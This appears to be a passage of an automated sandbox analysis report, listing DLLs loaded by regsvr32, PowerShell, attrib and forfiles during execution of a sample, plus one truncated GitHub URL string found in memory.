Source: powershell.exe, 00000006.00000002.2569213401.00000276803D2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.comX |
Source: C:\Windows\System32\loaddll64.exe | Section loaded: apphelp.dll | Jump to behavior |
Source: C:\Windows\System32\loaddll64.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Windows\System32\regsvr32.exe | Section loaded: apphelp.dll | Jump to behavior |
Source: C:\Windows\System32\regsvr32.exe | Section loaded: aclayers.dll | Jump to behavior |
Source: C:\Windows\System32\regsvr32.exe | Section loaded: sfc.dll | Jump to behavior |
Source: C:\Windows\System32\regsvr32.exe | Section loaded: sfc_os.dll | Jump to behavior |
Source: C:\Windows\System32\regsvr32.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Windows\System32\regsvr32.exe | Section loaded: uxtheme.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll | |
Source: C:\Windows\System32\attrib.exe | Section loaded: ulib.dll | Jump to behavior |
Source: C:\Windows\System32\attrib.exe | Section loaded: fsutilext.dll | Jump to behavior |
Source: C:\Windows\System32\attrib.exe | Section loaded: ulib.dll | Jump to behavior |
Source: C:\Windows\System32\attrib.exe | Section loaded: fsutilext.dll | Jump to behavior |
Source: C:\Windows\System32\attrib.exe | Section loaded: ulib.dll | Jump to behavior |
Source: C:\Windows\System32\attrib.exe | Section loaded: fsutilext.dll | Jump to behavior |
Source: C:\Windows\System32\forfiles.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll | Jump to behavior |
